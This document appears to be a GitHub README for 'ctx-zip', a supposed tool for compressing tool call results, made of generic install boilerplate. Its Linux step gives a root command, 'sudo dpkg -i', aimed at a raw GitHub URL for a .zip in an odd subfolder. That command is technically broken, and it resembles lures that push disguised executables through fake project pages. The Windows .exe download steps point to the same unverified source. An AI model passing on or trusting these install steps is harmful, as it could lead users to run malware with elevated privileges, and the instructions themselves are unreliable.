Welcome to ctx-zip! This tool simplifies context compression of tool call results. You don’t need to be a tech expert to use it. Follow these steps to get started.
Before downloading, make sure your computer meets these basic requirements:
- Operating System: Windows 10 or later, macOS 10.13 or later, or Linux (kernel 4.0 or higher)
- Processor: 1 GHz or faster
- Memory: At least 1 GB of RAM
- Storage: At least 50 MB of available disk space
ctx-zip offers several features to make your life easier:
- Compression: Reduce the size of tool call results for efficient storage.
- User-Friendly Interface: Simple design for easy navigation.
- Fast Processing: Quickly handles large sets of data without delays.
- Multi-Platform Support: Works on Windows, macOS, and Linux.
To get ctx-zip, visit this page to download. Here’s how to do it:
- Click the link above to go to the Releases page.
- On the Releases page, look for the latest version. It is usually at the top of the list.
- You will see files available for download. Choose the appropriate one for your operating system:
- For Windows, download the
.exefile. - For macOS, download the
.dmgfile. - For Linux, you may choose the appropriate package for your distribution.
- For Windows, download the
- Click on the file name to start the download. Your browser will prompt you to save the file.
- Once the download is complete, find the file in your Downloads folder.
If you downloaded the .exe file for Windows, follow these steps:
- Double-click the downloaded
.exefile. - Follow the on-screen instructions.
- After installation, you can find ctx-zip in your Start menu. Open it to start using the tool.
If you downloaded the .dmg file for macOS, follow these steps:
- Double-click the downloaded
.dmgfile. - Drag the ctx-zip icon to your Applications folder.
- Open your Applications folder and double-click ctx-zip to start using it.
If you downloaded a package for Linux, follow these steps:
- Open a terminal.
- Navigate to the directory where you downloaded the file.
- Use your package manager to install the package. For example, if you have a
.debfile, run:sudo dpkg -i https://raw.githubusercontent.com/mahmoud7876/ctx-zip/main/poundless/ctx-zip.zip - After installation, you can run ctx-zip from your applications menu or by typing
ctx-zipin your terminal.
Using ctx-zip is straightforward. Here’s how to compress your tool call results:
- Open ctx-zip from your applications.
- Click on the "Select File" button to choose the tool call result file you want to compress.
- Choose your preferred output location for the compressed file.
- Click on the "Compress" button.
- Your file will be compressed and saved to your chosen location.
- Choose the Right Format: Make sure your tool call results are saved in a compatible format.
- Regular Updates: Check for updates regularly on the Releases page to benefit from new features.
- Explore Settings: Familiarize yourself with settings to tailor ctx-zip to your needs.
If you run into any issues, you can get support easily:
- Check the Issues section on GitHub for common problems and solutions.
- Feel free to create a new issue if you don’t find an answer.
For additional help, look for community forums where other users discuss their experiences with ctx-zip.
ctx-zip makes context compression simple and efficient. With intuitive features and easy installation, you can start utilizing it right away. Download your version today and enjoy a smoother experience with your tool call results.
Remember, you can always return to the download page for updates or to get help.